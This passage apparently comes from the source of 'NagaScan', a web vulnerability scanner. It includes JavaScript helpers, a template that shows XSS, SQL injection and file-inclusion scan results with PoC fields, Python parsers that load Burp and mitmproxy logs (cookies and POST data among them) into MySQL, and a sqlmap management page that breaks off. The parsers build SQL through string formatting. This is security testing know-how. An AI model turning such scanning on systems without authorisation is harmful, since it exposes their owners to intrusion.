16 | c=p(c,d,e,f,v,7,a[8]),f=p(f,c,d,e,x,12,a[9]),e=p(e,f,c,d,y,17,a[10]),d=p(d,e,f,c,z,22,a[11]),c=p(c,d,e,f,A,7,a[12]),f=p(f,c,d,e,B,12,a[13]),e=p(e,f,c,d,C,17,a[14]),d=p(d,e,f,c,D,22,a[15]),c=m(c,d,e,f,w,5,a[16]),f=m(f,c,d,e,t,9,a[17]),e=m(e,f,c,d,z,14,a[18]),d=m(d,e,f,c,h,20,a[19]),c=m(c,d,e,f,s,5,a[20]),f=m(f,c,d,e,y,9,a[21]),e=m(e,f,c,d,D,14,a[22]),d=m(d,e,f,c,r,20,a[23]),c=m(c,d,e,f,x,5,a[24]),f=m(f,c,d,e,C,9,a[25]),e=m(e,f,c,d,q,14,a[26]),d=m(d,e,f,c,v,20,a[27]),c=m(c,d,e,f,B,5,a[28]),f=m(f,c,
17 | d,e,j,9,a[29]),e=m(e,f,c,d,u,14,a[30]),d=m(d,e,f,c,A,20,a[31]),c=l(c,d,e,f,s,4,a[32]),f=l(f,c,d,e,v,11,a[33]),e=l(e,f,c,d,z,16,a[34]),d=l(d,e,f,c,C,23,a[35]),c=l(c,d,e,f,w,4,a[36]),f=l(f,c,d,e,r,11,a[37]),e=l(e,f,c,d,u,16,a[38]),d=l(d,e,f,c,y,23,a[39]),c=l(c,d,e,f,B,4,a[40]),f=l(f,c,d,e,h,11,a[41]),e=l(e,f,c,d,q,16,a[42]),d=l(d,e,f,c,t,23,a[43]),c=l(c,d,e,f,x,4,a[44]),f=l(f,c,d,e,A,11,a[45]),e=l(e,f,c,d,D,16,a[46]),d=l(d,e,f,c,j,23,a[47]),c=n(c,d,e,f,h,6,a[48]),f=n(f,c,d,e,u,10,a[49]),e=n(e,f,c,d,
18 | C,15,a[50]),d=n(d,e,f,c,s,21,a[51]),c=n(c,d,e,f,A,6,a[52]),f=n(f,c,d,e,q,10,a[53]),e=n(e,f,c,d,y,15,a[54]),d=n(d,e,f,c,w,21,a[55]),c=n(c,d,e,f,v,6,a[56]),f=n(f,c,d,e,D,10,a[57]),e=n(e,f,c,d,t,15,a[58]),d=n(d,e,f,c,B,21,a[59]),c=n(c,d,e,f,r,6,a[60]),f=n(f,c,d,e,z,10,a[61]),e=n(e,f,c,d,j,15,a[62]),d=n(d,e,f,c,x,21,a[63]);b[0]=b[0]+c|0;b[1]=b[1]+d|0;b[2]=b[2]+e|0;b[3]=b[3]+f|0},_doFinalize:function(){var a=this._data,k=a.words,b=8*this._nDataBytes,h=8*a.sigBytes;k[h>>>5]|=128<<24-h%32;var l=s.floor(b/
19 | 4294967296);k[(h+64>>>9<<4)+15]=(l<<8|l>>>24)&16711935|(l<<24|l>>>8)&4278255360;k[(h+64>>>9<<4)+14]=(b<<8|b>>>24)&16711935|(b<<24|b>>>8)&4278255360;a.sigBytes=4*(k.length+1);this._process();a=this._hash;k=a.words;for(b=0;4>b;b++)h=k[b],k[b]=(h<<8|h>>>24)&16711935|(h<<24|h>>>8)&4278255360;return a},clone:function(){var a=t.clone.call(this);a._hash=this._hash.clone();return a}});r.MD5=t._createHelper(q);r.HmacMD5=t._createHmacHelper(q)})(Math);
20 | 


--------------------------------------------------------------------------------
/www/static/js/nagascan.js:
--------------------------------------------------------------------------------
  1 | // awesome.js
  2 | 
  3 | function showError(err) {
  4 |     var alert = $('div.uk-alert-danger');
  5 |     if (err) {
  6 |         alert.text(err.message || err.error || err).removeClass('uk-hidden').show();
  7 |         try {
  8 |             if (alert.offset().top < ($(window).scrollTop() - 41)) {
  9 |                 $('html,body').animate({scrollTop: alert.offset().top - 41});
 10 |             }
 11 |         }
 12 |         catch (e) {}
 13 |     }
 14 |     else {
 15 |         alert.addClass('uk-hidden').hide().text('');
 16 |     }
 17 | }
 18 | 
 19 | function _ajax(method, url, data, callback) {
 20 |     $.ajax({
 21 |         type: method,
 22 |         url: url,
 23 |         data: data,
 24 |         dataType: 'json'
 25 |     }).done(function(r) {
 26 |         if (r && r.error) {
 27 |             return callback && callback(r);
 28 |         }
 29 |         return callback && callback(null, r);
 30 |     }).fail(function(jqXHR, textStatus) {
 31 |         return callback && callback({error: 'HTTP ' + jqXHR.status, message: 'Network error (HTTP ' + jqXHR.status + ')'});
 32 |     });
 33 | }
 34 | 
 35 | function getApi(url, data, callback) {
 36 |     if (arguments.length === 2) {
 37 |         callback = data;
 38 |         data = {};
 39 |     }
 40 |     _ajax('GET', url, data, callback);
 41 | }
 42 | 
 43 | function postApi(url, data, callback) {
 44 |     if (arguments.length === 2) {
 45 |         callback = data;
 46 |         data = {};
 47 |     }
 48 |     _ajax('POST', url, data, callback);
 49 | }
 50 | 
 51 | function startLoading() {
 52 |     var btn = $('form').find('button[type=submit]');
 53 |     var icon = btn.find('i');
 54 |     icon.addClass('uk-icon-spinner').addClass('uk-icon-spin');
 55 |     btn.attr('disabled', 'disabled');
 56 | }
 57 | 
 58 | function stopLoading() {
 59 |     var btn = $('form').find('button[type=submit]');
 60 |     var icon = btn.find('i');
 61 |     icon.removeClass('uk-icon-spin').removeClass('uk-icon-spinner');
 62 |     btn.removeAttr('disabled');
 63 | }
 64 | 
 65 | // add to prototype:
 66 | 
 67 | if (! String.prototype.trim) {
 68 |     String.prototype.trim = function() {
 69 |         return this.replace(/^\s+|\s+$/g, '');
 70 |     };
 71 | }
 72 | 
 73 | if (! Number.prototype.toDateTime) {
 74 |     var replaces = {
 75 |         'yyyy': function(dt) {
 76 |             return dt.getFullYear().toString();
 77 |         },
 78 |         'yy': function(dt) {
 79 |             return (dt.getFullYear() % 100).toString();
 80 |         },
 81 |         'MM': function(dt) {
 82 |             var m = dt.getMonth() + 1;
 83 |             return m < 10 ? '0' + m : m.toString();
 84 |         },
 85 |         'M': function(dt) {
 86 |             var m = dt.getMonth() + 1;
 87 |             return m.toString();
 88 |         },
 89 |         'dd': function(dt) {
 90 |             var d = dt.getDate();
 91 |             return d < 10 ? '0' + d : d.toString();
 92 |         },
 93 |         'd': function(dt) {
 94 |             var d = dt.getDate();
 95 |             return d.toString();
 96 |         },
 97 |         'hh': function(dt) {
 98 |             var h = dt.getHours();
 99 |             return h < 10 ? '0' + h : h.toString();
100 |         },
101 |         'h': function(dt) {
102 |             var h = dt.getHours();
103 |             return h.toString();
104 |         },
105 |         'mm': function(dt) {
106 |             var m = dt.getMinutes();
107 |             return m < 10 ? '0' + m : m.toString();
108 |         },
109 |         'm': function(dt) {
110 |             var m = dt.getMinutes();
111 |             return m.toString();
112 |         },
113 |         'ss': function(dt) {
114 |             var s = dt.getSeconds();
115 |             return s < 10 ? '0' + s : s.toString();
116 |         },
117 |         's': function(dt) {
118 |             var s = dt.getSeconds();
119 |             return s.toString();
120 |         },
121 |         'a': function(dt) {
122 |             var h = dt.getHours();
123 |             return h < 12 ? 'AM' : 'PM';
124 |         }
125 |     };
126 |     var token = /([a-zA-Z]+)/;
127 |     Number.prototype.toDateTime = function(format) {
128 |         var fmt = format || 'yyyy-MM-dd hh:mm'
129 |         var dt = new Date(this * 1000);
130 |         var arr = fmt.split(token);
131 |         for (var i=0; i<arr.length; i++) {
132 |             var s = arr[i];
133 |             if (s && s in replaces) {
134 |                 arr[i] = replaces[s](dt);
135 |             }
136 |         }
137 |         return arr.join('');
138 |     };
139 | }
140 | 
141 | function gotoPage(index) {
142 |     if (index) {
143 |         var search = location.search;
144 |         var hasPageParam = search.search(/page\=\d+\&?/)!==(-1);
145 |         if (hasPageParam) {
146 |             search = search.replace(/page\=\d+\&?/g, '');
147 |         }
148 |         search = (search==='' || search==='?') ? ('?page=' + index) : (search + '&page=' + index);
149 |         location.assign(search);
150 |     }
151 | }
152 | 
153 | function showConfirm(title, text, fn_ok, fn_cancel) {
154 |     var s = '<div id="div-confirm" class="uk-modal">' +
155 |             '<div class="uk-modal-dialog">' +
156 |             '<a href="#0" class="uk-modal-close uk-close"></a>' +
157 |             '<h1 class="x-title"></h1>' +
158 |             '<p class="x-text"></p>' +
159 |             '<hr><p class="uk-text-center">' +
160 |             '<button class="uk-button uk-button-primary x-ok"><i class="uk-icon-check"></i> 是</button>' +
161 |             '&nbsp;&nbsp;&nbsp;' +
162 |             '<button class="uk-button x-cancel"><i class="uk-icon-times"></i> 否</button>' +
163 |             '</p></div></div>';
164 |     $('body').append(s);
165 |     var m = $('#div-confirm');
166 |     var modal = new $.UIkit.modal.Modal('#div-confirm');
167 |     m.find('.x-title').text(title);
168 |     m.find('.x-text').text(text);
169 |     m.find('.x-ok').click(function () {
170 |         modal.hide();
171 |         fn_ok && fn_ok();
172 |     });
173 |     m.find('.x-cancel').click(function () {
174 |         modal.hide();
175 |         fn_cancel && fn_cancel();
176 |     });
177 |     m.on({
178 |         'uk.modal.hide': function() {
179 |             $('#div-confirm').remove();
180 |         }
181 |     });
182 |     modal.show();
183 | }
184 | 
185 | $(function() {
186 |     if (location.pathname === '/' || location.pathname.indexOf('/blog')===0) {
187 |         $('li[data-url=blogs]').addClass('uk-active');
188 |     }
189 | });
190 | 


--------------------------------------------------------------------------------
/www/templates/manage_request_view.html:
--------------------------------------------------------------------------------
  1 | {% extends '__base__.html' %}
  2 | 
  3 | {% block title %}View Scan Results{% endblock %}
  4 | 
  5 | {% block beforehead %}
  6 | 
  7 | <script>
  8 | 
  9 | var url = '{{ url }}';
 10 | 
 11 | function initVM(data) {
 12 |     $('#div-request-view').show();
 13 |     var vm = new Vue({
 14 |         el: '#div-request-view',
 15 |         data: {
 16 |             request: data.request[0],
 17 |             response: data.response[0],
 18 |         }
 19 |     });
 20 | }
 21 | 
 22 | $(function() {
 23 |     $('#div-request-view').hide();
 24 |     getApi(url, function (err, results) {
 25 |         if (err) {
 26 |             return showError(err);
 27 |         }
 28 |         $('#div-loading').hide();
 29 |         initVM(results);
 30 |     });
 31 | });
 32 | 
 33 | </script>
 34 | 
 35 | {% endblock %}
 36 | 
 37 | {% block content %}
 38 | 
 39 |     <div id="div-request-view" class="uk-width">
 40 |           <dl v-if="request.id" class="uk-description-list-horizontal">
 41 |               <dt>ID:</dt>
 42 |               <dd><p v-model="request.id"></p></dd>
 43 |           </dl>
 44 |           <dl v-if="request.rid" class="uk-description-list-horizontal">
 45 |               <dt>RID:</dt>
 46 |               <dd><p v-model="request.rid"></p></dd>
 47 |           </dl>
 48 |           <dl v-if="request.update_time" class="uk-description-list-horizontal">
 49 |               <dt>Time:</dt>
 50 |               <dd><p v-model="request.update_time" ></p></dd>
 51 |           </dl>
 52 |           <dl v-if="request.method" class="uk-description-list-horizontal">
 53 |               <dt>Method:</dt>
 54 |               <dd><p v-model="request.method" ></p></dd>
 55 |           </dl>
 56 |           <dl v-if="request.ip" class="uk-description-list-horizontal">
 57 |               <dt>IP:</dt>
 58 |               <dd><p v-model="request.ip" ></p></dd>
 59 |           </dl>
 60 |           <dl v-if="request.protocol&&request.host&&request.path" class="uk-description-list-horizontal">
 61 |               <dt>URL:</dt>
 62 |               <dd><p v-model="request.protocol+'://'+request.host+request.path" ></p></dd>
 63 |           </dl>
 64 |           <dl v-if="request.accept" class="uk-description-list-horizontal">
 65 |               <dt>Accept:</dt>
 66 |               <dd><p v-model="request.accept" ></p></dd>
 67 |           </dl>
 68 |           <dl v-if="request.accept_language" class="uk-description-list-horizontal">
 69 |               <dt>Accept Language:</dt>
 70 |               <dd><p v-model="request.accept_language" ></p></dd>
 71 |           </dl>
 72 |           <dl v-if="request.accept_encoding" class="uk-description-list-horizontal">
 73 |               <dt>Accept Encoding:</dt>
 74 |               <dd><p v-model="request.accept_encoding" ></p></dd>
 75 |           </dl>
 76 |           <dl v-if="request.referer" class="uk-description-list-horizontal">
 77 |               <dt>Referer:</dt>
 78 |               <dd><p v-model="request.referer" ></p></dd>
 79 |           </dl>
 80 |           <dl v-if="request.user_agent" class="uk-description-list-horizontal">
 81 |               <dt>User Agent:</dt>
 82 |               <dd><p v-model="request.user_agent" ></p></dd>
 83 |           </dl>
 84 |           <dl v-if="request.cookie" class="uk-description-list-horizontal">
 85 |               <dt>Cookie:</dt>
 86 |               <dd><p v-model="request.cookie" ></p></dd>
 87 |           </dl>
 88 |           <dl v-if="request.content_type" class="uk-description-list-horizontal">
 89 |               <dt>Content Type:</dt>
 90 |               <dd><p v-model="request.content_type" ></p></dd>
 91 |           </dl>
 92 |           <dl v-if="request.post_data" class="uk-description-list-horizontal">
 93 |               <dt>Post Data:</dt>
 94 |               <dd><p v-model="request.post_data" ></p></dd>
 95 |           </dl>
 96 |           <dl v-if="request.result_xss" class="uk-description-list-horizontal">
 97 |               <dt>Scan Result of XSS:</dt>
 98 |               <dd><span v-if="request.result_xss=='vulnerable'" class="uk-badge uk-badge-danger">vulnerable</span></dd>
 99 |               <dd><span v-if="request.result_xss=='not vulnerable'" class="uk-badge uk-badge-success">not vulnerable</span></dd>
100 |               <dd><span v-if="request.result_xss=='not scan yet'" class="uk-badge uk-badge-warning">not scan yet</span></dd>
101 |           </dl>
102 |           <dl v-if="request.result_sqli" class="uk-description-list-horizontal">
103 |               <dt>Scan Result of SQLi:</dt>
104 |               <dd><span v-if="request.result_sqli=='vulnerable'" class="uk-badge uk-badge-danger">vulnerable</span></dd>
105 |               <dd><span v-if="request.result_sqli=='not vulnerable'" class="uk-badge uk-badge-success">not vulnerable</span></dd>
106 |               <dd><span v-if="request.result_sqli=='not scan yet'" class="uk-badge uk-badge-warning">not scan yet</span></dd>
107 |           </dl>
108 |           <dl v-if="request.result_fi" class="uk-description-list-horizontal">
109 |               <dt>Scan Result of FI:</dt>
110 |               <dd><span v-if="request.result_fi=='vulnerable'" class="uk-badge uk-badge-danger">vulnerable</span></dd>
111 |               <dd><span v-if="request.result_fi=='not vulnerable'" class="uk-badge uk-badge-success">not vulnerable</span></dd>
112 |               <dd><span v-if="request.result_fi=='not scan yet'" class="uk-badge uk-badge-warning">not scan yet</span></dd>
113 |           </dl>
114 |           <dl v-if="request.poc_xss" class="uk-description-list-horizontal">
115 |               <dt>POC of XSS:</dt>
116 |               <dd><p v-model="request.poc_xss" ></p></dd>
117 |           </dl>
118 |           <dl v-if="request.poc_sqli" class="uk-description-list-horizontal">
119 |               <dt>POC of SQLi:</dt>
120 |               <dd><p v-model="request.poc_sqli" ></p></dd>
121 |           </dl>
122 |           <dl v-if="request.poc_fi" class="uk-description-list-horizontal">
123 |               <dt>POC of FI:</dt>
124 |               <dd><p v-model="request.poc_fi" ></p></dd>
125 |           </dl>
126 |           <dl v-if="request.result_xss == 'vulnerable'" class="uk-description-list-horizontal">
127 |               <dt>Response of XSS:</dt>
128 |               <dd><pre v-model="response.response_xss" ></pre></dd>
129 |           </dl>
130 |           <dl v-if="request.result_fi == 'vulnerable'" class="uk-description-list-horizontal">
131 |               <dt>Response of FI:</dt>
132 |               <dd><pre v-model="response.response_fi" ></pre></dd>
133 |           </dl>
134 |           <div class="uk-width-1-1 uk-text-center">
135 |               <a class="uk-button uk-button-success" href="javascript:history.go(-1)" ><i class="uk-icon-undo"></i> Return</a>
136 |           </div>
137 |     </div>
138 | 
139 | 
140 |     <div id="div-loading" class="uk-width-1-1 uk-text-center">
141 |         <span><i class="uk-icon-spinner uk-icon-medium uk-icon-spin"></i> Loading...</span>
142 |     </div>
143 | {% endblock %}
144 | 


--------------------------------------------------------------------------------
/parser/parser_mitmproxy.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | 
  3 | """ Parse mitmproxy Request Log
  4 | 
  5 | This module is used to parse mitmproxy Requests and insert into MySQL DB.
  6 | 
  7 | Usage:
  8 |     python parser_mitmproxy.py logs.txt
  9 | 
 10 | """
 11 | 
 12 | import sys
 13 | import re
 14 | import MySQLdb
 15 | import hashlib
 16 | import time
 17 | from lib.db_operation import db_insert, db_query, fetch_exclusion_parse, get_parse_exclusion_info
 18 | from lib.utils import highlight, escape_content
 19 | 
 20 | 
 21 | ENVIRONMENT = "Linux"
 22 | #ENVIRONMENT = "Windows"
 23 | 
 24 | def is_duplicate(table, rid):
 25 |     try:
 26 |         sql = "SELECT COUNT(*) FROM {} where rid ='{}'".format(table, rid.strip())
 27 |         query_result = db_query(sql)
 28 |         count = [row[0] for row in query_result]
 29 |         if count[0] >= 1:
 30 |             return True
 31 |         else:
 32 |             return False
 33 |     except Exception, e:
 34 |         print highlight('[!] {}'.format(str(e)), 'red')
 35 |         return False
 36 | 
 37 | def insert_request(request):
 38 |     try:
 39 |         feeds = []
 40 |         for key, value in request.items():
 41 |             if key != 'time':
 42 |                 feeds.append(escape_content(value))
 43 |         feeds_str = ",".join(feeds)
 44 |         rid = hashlib.sha256(feeds_str).hexdigest()
 45 |         if not is_duplicate('requests', rid):
 46 |             now = str(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
 47 |             table_request = 'requests'
 48 |             request['rid'] = rid
 49 |             request['update_time'] = now
 50 | 
 51 |             table_response = 'responses'
 52 |             args_response = {}
 53 |             args_response['rid'] = rid
 54 |             args_response['update_time'] = now
 55 | 
 56 |             flag = 'insert'
 57 |         else:
 58 |             now = str(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
 59 |             table_request = 'requests'
 60 |             args_request = {}
 61 |             args_request['update_time'] = now
 62 |             cons_request = {}
 63 |             cons_request['rid'] = rid
 64 | 
 65 |             table_response = 'responses'
 66 |             args_response = {}
 67 |             args_response['update_time'] = now
 68 |             cons_response = {}
 69 |             cons_response['rid'] = rid
 70 | 
 71 |             flag = 'update'
 72 |         if flag == 'insert':
 73 |             if db_insert(table_request, request) and db_insert(table_response, args_response):
 74 |                 print highlight('[+] {} request rid: {}, url: {}://{}{}'.format(flag, rid, request['protocol'], request['host'], request['path']), 'green')
 75 |                 return True
 76 |             else:
 77 |                 return False
 78 |     except Exception, e:
 79 |         print highlight('[!] {}'.format(str(e)), 'red')
 80 |         return False
 81 | 
 82 | def get_item_info(line, item, delim):
 83 |     if item in line:
 84 |         item_info = line.split(delim, 1)[1].strip()
 85 |         reg = '^b\'(.*?)\'$'
 86 |         match = re.search(reg, item_info)
 87 |         if match:
 88 |             item_info = match.group(1)
 89 |     else:
 90 |         item_info = ''
 91 |     return item_info
 92 | 
 93 | def is_contained(rtext, excludes):
 94 |     if len(excludes):
 95 |         excludes_str = '|'.join(excludes)
 96 |         reg = '.*({}).*'.format(excludes_str)
 97 |         res = re.search(reg, rtext)
 98 |         if res:
 99 |             return True
100 |         else:
101 |             return False
102 |     else:
103 |         return False
104 | 
105 | def get_file_to_array(log_file):
106 |     with open(log_file, 'rb') as f:  # Note: Here is 'rb' rather than 'r'
107 |         contents = f.readlines()
108 |     num_of_delim = 0
109 |     requests = []
110 |     request_str = ''
111 |     for i in range(len(contents)):
112 |         if num_of_delim == 1:
113 |             requests.append(request_str.strip('\r\n'))
114 |             request_str = ''
115 |             num_of_delim = 0
116 |         if '======================================================' in contents[i]:
117 |             num_of_delim += 1
118 |         request_str += contents[i]
119 |     return requests
120 | 
121 | def parse_request_info(request_info):
122 |     if ENVIRONMENT == "Linux":
123 |         lines = request_info.split('\n') # For Linux
124 |     elif ENVIRONMENT == "Windows":
125 |         lines = request_info.split('\n') # For Windows
126 |     requestinfo = {}
127 |     for line in lines:
128 |         time = get_item_info(line, 'time:', ': ')
129 |         protocol = get_item_info(line, 'protocol:', ': ')
130 |         host = get_item_info(line, 'host:', ': ')
131 |         path = get_item_info(line, 'path:', ': ')
132 |         method = get_item_info(line, 'method:', ': ')
133 |         port = get_item_info(line, 'port:', ': ')
134 |         user_agent = get_item_info(line, 'user_agent:', ': ')
135 |         accept = get_item_info(line, 'accept:', ': ')
136 |         accept_language = get_item_info(line, 'accept_language:', ': ')
137 |         accept_encoding = get_item_info(line, 'accept_encoding:', ': ')
138 |         content_type = get_item_info(line, 'content_type:', ': ')
139 |         referer = get_item_info(line, 'referer:', ': ')
140 |         cookie = get_item_info(line, 'cookie:', ': ')
141 |         post_data = get_item_info(line, 'post_data:', ': ')
142 |         if time:
143 |             requestinfo['time'] = time
144 |         if protocol:
145 |             requestinfo['protocol'] = protocol
146 |         if port:
147 |             requestinfo['port'] = port
148 |         if method:
149 |             requestinfo['method'] = method
150 |         if path:
151 |             requestinfo['path'] = path
152 |         if host:
153 |             requestinfo['host'] = host
154 |         if user_agent:
155 |             requestinfo['user_agent'] = user_agent
156 |         if accept:
157 |             requestinfo['accept'] = accept
158 |         if accept_language:
159 |             requestinfo['accept_language'] = accept_language
160 |         if accept_encoding:
161 |             requestinfo['accept_encoding'] = accept_encoding
162 |         if content_type:
163 |             requestinfo['content_type'] = content_type
164 |         if referer:
165 |             requestinfo['referer'] = referer
166 |         if cookie:
167 |             requestinfo['cookie'] = cookie
168 |         if post_data:
169 |             requestinfo['post_data'] = post_data
170 |     return requestinfo
171 | 
172 | def parse_log(log_file, excludes):
173 |     requests = get_file_to_array(log_file)
174 |     for request in requests:
175 |         if not is_contained(request, excludes):
176 |             request_info = request.split('======================================================')[0]
177 |             request_info_parsed = parse_request_info(request_info)
178 |             insert_request(request_info_parsed) # Insert Mitmproxy requests into Database
179 | 
180 | def main():
181 |     log_file = sys.argv[1]
182 |     excludes = get_parse_exclusion_info(fetch_exclusion_parse()[0])
183 |     parse_log(log_file, excludes)
184 | 
185 | if __name__ == "__main__":
186 |     while True:
187 |         now = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
188 |         delim = '.............................................'
189 |         print "[*][{}] Time: {}\n{}".format('Requests Analysis', highlight(str(now), 'green'), delim)
190 |         main()
191 |         time.sleep(5)
192 |         print delim, '\n'
193 | 


--------------------------------------------------------------------------------
/parser/parser_burp.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | 
  3 | """ Parse Burp Request Log
  4 | 
  5 | This module is used to parse Burp Requests and insert into MySQL DB.
  6 | 
  7 | Usage:
  8 |     python parser_burp.py logs.txt
  9 | 
 10 | """
 11 | 
 12 | import sys
 13 | import re
 14 | import MySQLdb
 15 | import hashlib
 16 | import time
 17 | from lib.db_operation import db_insert, db_query, fetch_exclusion_parse, get_parse_exclusion_info
 18 | from lib.utils import highlight, escape_content
 19 | 
 20 | 
 21 | ENVIRONMENT = "Linux"
 22 | #ENVIRONMENT = "Windows"
 23 | 
 24 | def is_duplicate(table, rid):
 25 |     try:
 26 |         sql = "SELECT COUNT(*) FROM {} where rid ='{}'".format(table, rid.strip())
 27 |         query_result = db_query(sql)
 28 |         count = [row[0] for row in query_result]
 29 |         if count[0] >= 1:
 30 |             return True
 31 |         else:
 32 |             return False
 33 |     except Exception, e:
 34 |         print highlight('[!] {}'.format(str(e)), 'red')
 35 |         return False
 36 | 
 37 | def insert_request(request):
 38 |     try:
 39 |         feeds = []
 40 |         for key, value in request.items():
 41 |             if key != 'time':
 42 |                 feeds.append(escape_content(value))
 43 |         feeds_str = ",".join(feeds)
 44 |         rid = hashlib.sha256(feeds_str).hexdigest()
 45 |         if not is_duplicate('requests', rid):
 46 |             now = str(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
 47 |             table_request = 'requests'
 48 |             request['rid'] = rid
 49 |             request['update_time'] = now
 50 | 
 51 |             table_response = 'responses'
 52 |             args_response = {}
 53 |             args_response['rid'] = rid
 54 |             args_response['update_time'] = now
 55 | 
 56 |             flag = 'insert'
 57 |         else:
 58 |             now = str(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
 59 |             table_request = 'requests'
 60 |             args_request = {}
 61 |             args_request['update_time'] = now
 62 |             cons_request = {}
 63 |             cons_request['rid'] = rid
 64 | 
 65 |             table_response = 'responses'
 66 |             args_response = {}
 67 |             args_response['update_time'] = now
 68 |             cons_response = {}
 69 |             cons_response['rid'] = rid
 70 | 
 71 |             flag = 'update'
 72 |         if flag == 'insert':
 73 |             if db_insert(table_request, request) and db_insert(table_response, args_response):
 74 |                 print highlight('[+] {} request rid: {}, url: {}://{}{}'.format(flag, rid, request['protocol'], request['host'], request['path']), 'green')
 75 |                 return True
 76 |             else:
 77 |                 return False
 78 |     except Exception, e:
 79 |         print highlight('[!] {}'.format(str(e)), 'red')
 80 |         return False
 81 | 
 82 | def get_item_info(line, item, delim):
 83 |     if item in line:
 84 |         item_info = line.split(delim)[1].strip()
 85 |     else:
 86 |         item_info = ''
 87 |     return item_info
 88 | 
 89 | def is_contained(rtext, excludes):
 90 |     if len(excludes):
 91 |         excludes_str = '|'.join(excludes)
 92 |         reg = '.*({}).*'.format(excludes_str)
 93 |         res = re.search(reg, rtext)
 94 |         if res:
 95 |             return True
 96 |         else:
 97 |             return False
 98 |     else:
 99 |         return False
100 | 
101 | def get_file_to_array(log_file):
102 |     with open(log_file, 'rb') as f:  # Note: Here is 'rb' rather than 'r'
103 |         contents = f.readlines()
104 |     num_of_delim = 0
105 |     requests = []
106 |     request_str = ''
107 |     for i in range(len(contents)):
108 |         if num_of_delim == 3:
109 |             requests.append(request_str.strip('\r\n'))
110 |             request_str = ''
111 |             num_of_delim = 0
112 |         if '======================================================' in contents[i]:
113 |             num_of_delim += 1
114 |         request_str += contents[i]
115 |     return requests
116 | 
117 | def parse_url_info(url_info):
118 |     urlinfo = {}
119 |     if len(url_info.strip('\r\n').split('  ')) == 3:
120 |         time, url, ip = url_info.strip('\r\n').split('  ')
121 |     else:
122 |         time, url = url_info.strip('\r\n').split('  ')
123 |         ip = ""
124 |     if url:
125 |         protocol = url.split(':')[0]
126 |         port = url.split(':')[-1]
127 |     if ip:
128 |         se = re.search('.*\[(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}?)\].*', ip)
129 |         if se:
130 |              ip = se.group(1).strip()
131 |              urlinfo['time'], urlinfo['protocol'], urlinfo['port'], urlinfo['ip'] = time, protocol, port, ip
132 |     else:
133 |         urlinfo['time'], urlinfo['protocol'], urlinfo['port'] = time, protocol, port
134 |     return urlinfo
135 | 
136 | def parse_request_info(request_info):
137 |     if ENVIRONMENT == "Linux":
138 |         lines = request_info.split('\r\n') # For Linux
139 |     elif ENVIRONMENT == "Windows":
140 |         lines = request_info.split('\n') # For Windows
141 |     requestinfo = {}
142 |     for line in lines[1:]:
143 |         if 'HTTP/' in line:
144 |             method = line.split(' ')[0]
145 |             path = line.split(' ')[1]
146 |         host = get_item_info(line, 'Host:', ': ')
147 |         user_agent = get_item_info(line, 'User-Agent:', ': ')
148 |         accept = get_item_info(line, 'Accept:', ': ')
149 |         accept_language = get_item_info(line, 'Accept-Language:', ': ')
150 |         accept_encoding = get_item_info(line, 'Accept-Encoding:', ': ')
151 |         content_type = get_item_info(line, 'Content-Type:', ': ')
152 |         referer = get_item_info(line, 'Referer:', ': ')
153 |         cookie = get_item_info(line, 'Cookie:', ': ')
154 |         if method:
155 |             requestinfo['method'] = method
156 |         if path:
157 |             requestinfo['path'] = path
158 |         if host:
159 |             requestinfo['host'] = host
160 |         if user_agent:
161 |             requestinfo['user_agent'] = user_agent
162 |         if accept:
163 |             requestinfo['accept'] = accept
164 |         if accept_language:
165 |             requestinfo['accept_language'] = accept_language
166 |         if accept_encoding:
167 |             requestinfo['accept_encoding'] = accept_encoding
168 |         if content_type:
169 |             requestinfo['content_type'] = content_type
170 |         if referer:
171 |             requestinfo['referer'] = referer
172 |         if cookie:
173 |             requestinfo['cookie'] = cookie
174 |     if requestinfo['method'] == "POST":
175 |         post_data = lines[-2]
176 |         requestinfo['post_data'] = post_data
177 |     return requestinfo
178 | 
179 | def parse_log(log_file, excludes):
180 |     requests = get_file_to_array(log_file)
181 |     for request in requests:
182 |         if not is_contained(request, excludes):
183 |             url_info = request.split('======================================================')[1]
184 |             request_info = request.split('======================================================')[2]
185 |             url_info_parsed = parse_url_info(url_info)
186 |             request_info_parsed = parse_request_info(request_info)
187 |             request_parsed = dict(url_info_parsed, **request_info_parsed)
188 |             insert_request(request_parsed) # Insert Burp requests into Database
189 | 
190 | def main():
191 |     log_file = sys.argv[1]
192 |     excludes = get_parse_exclusion_info(fetch_exclusion_parse()[0])
193 |     parse_log(log_file, excludes)
194 | 
195 | if __name__ == "__main__":
196 |     while True:
197 |         now = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
198 |         delim = '.............................................'
199 |         print "[*][{}] Time: {}\n{}".format('Requests Analysis', highlight(str(now), 'green'), delim)
200 |         main()
201 |         time.sleep(5)
202 |         print delim, '\n'
203 | 


--------------------------------------------------------------------------------
/www/templates/manage_scan_view.html:
--------------------------------------------------------------------------------
  1 | {% extends '__base__.html' %}
  2 | 
  3 | {% block title %}
  4 | Scan Options -
  5 | {% if type == 'sqlmap' %}SQLMAP Servers
  6 | {% else %}Unknown
  7 | {% endif %}
  8 | {% endblock %}
  9 | 
 10 | {% block beforehead %}
 11 | 
 12 | <script>
 13 | 
 14 | function initVM(data) {
 15 |     $('#div-scan').show();
 16 |     var vm = new Vue({
 17 |         el: '#div-scan',
 18 |         data: {
 19 |             sqlmaps: data.sqlmaps,
 20 |             type: data.type,
 21 |             page: data.page
 22 |         },
 23 |         methods: {
 24 |             previous: function () {
 25 |                 gotoPage(this.page.page_index - 1);
 26 |             },
 27 |             next: function () {
 28 |                 gotoPage(this.page.page_index + 1);
 29 |             },
 30 |             edit_sqlmap: function (sqlmap) {
 31 |                 var url = '/manage/scan/{{ type }}/' + sqlmap.id + '/edit';
 32 |                 location.href = url;
 33 |             },
 34 |             delete_sqlmap: function (sqlmap) {
 35 |                 var url = '/api/scan/{{ type }}/' + sqlmap.id + '/delete';
 36 |                 getApi(url, function (err, r) {
 37 |                     if (err) {
 38 |                         showError(err);
 39 |                         $('#error_alert').show();
 40 |                         setTimeout("$('#error_alert').hide()", 3000);
 41 |                     }
 42 |                     else {
 43 |                         return location.assign('/manage/scan/sqlmap/view');
